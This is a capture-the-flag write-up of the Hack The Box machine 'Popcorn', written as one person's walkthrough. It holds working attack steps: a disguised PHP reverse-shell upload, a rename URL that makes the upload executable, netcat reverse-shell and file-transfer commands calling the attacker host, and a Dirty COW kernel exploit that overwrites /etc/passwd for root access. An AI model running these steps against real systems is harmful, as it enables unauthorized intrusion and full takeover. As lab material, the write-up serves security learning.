HTB: Popcorn

Details

This machine is Popcorn from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-27 14:08 EDT
Nmap scan report for 10.10.10.6
Host is up (0.037s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.15 seconds

The Box

Port 80 it is

Screenshot 1

I setup dirbuster

Screenshot 2

Screenshot 3

So off to http://10.10.10.6/torrent/

Screenshot 4

I tried registering

Screenshot 5

Screenshot 6

I then login and head over to upload where I tried to upload a php reverse shell

Screenshot 7

Screenshot 8

So I took a look at the renamer file from before

Screenshot 9

So maybe useful, but not right now. Next I tried uploading my shell as .torrent and using renamer to rename it to php. But this didn't work either. So I moved onto http://10.10.10.6/torrent/upload/

Screenshot 10

And the torrent host page allowed file upload for images, so I uploaded my shell as a jpeg

Screenshot 11

Screenshot 12

The page showed me it was located at http://10.10.10.6/torrent/upload/dd8255ecdc7ca55fb0bbf81323d87062db1f6d1c.jpg, so I guessed it's on disk position as

/var/www/torrent/upload/dd8255ecdc7ca55fb0bbf81323d87062db1f6d1c.jpg

So I used the renamer to try and make it php again by going to http://10.10.10.6/rename/index.php?filename=/var/www/torrent/upload/dd8255ecdc7ca55fb0bbf81323d87062db1f6d1c.jpg&newfilename=/var/www/torrent/upload/dd8255ecdc7ca55fb0bbf81323d87062db1f6d1c.php

Screenshot 13

I opened a listener

root@kali:~# nc -nlvp 4444

And triggered the shell by going to http://10.10.10.6/torrent/upload/dd8255ecdc7ca55fb0bbf81323d87062db1f6d1c.php

connect to [10.10.14.11] from (UNKNOWN) [10.10.10.6] 59902
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 22:43:33 up  2:24,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ 

I then upgraded the shell

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@popcorn:/$ 

I found this box was vulnerable to dirty cow

www-data@popcorn:/var/www/torrent$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

So I grabbed a copy from https://www.exploit-db.com/raw/40839, checking if I had gcc on the machine

www-data@popcorn:/var/www/torrent$ cd /tmp
www-data@popcorn:/tmp$ which gcc
/usr/bin/gcc

Then transferred and compiled the exploit

root@kali:~# nc -nlvp 5555 < cow.c

www-data@popcorn:/tmp$ nc 10.10.14.11 5555 > cow.c

www-data@popcorn:/tmp$ gcc cow.c -pthread -lcrypt -o cow

I then ran the exploit

www-data@popcorn:/tmp$ ./cow
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password

Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash

mmap: b77a8000

And ssh'd in as the modified root user

root@kali:~# ssh firefart@10.10.10.6 
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/

  System information as of Fri Sep 27 22:58:21 EEST 2019

  System load: 2.03              Memory usage: 10%   Processes:       117
  Usage of /:  6.7% of 14.80GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sun Sep 24 18:01:48 2017
firefart@popcorn:~# 

firefart@popcorn:~# id
uid=0(firefart) gid=0(root) groups=0(root)

And then grabbed the flags

firefart@popcorn:/home/george# cat user.txt 
[REDACTED]

firefart@popcorn:~# cat root.txt 
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *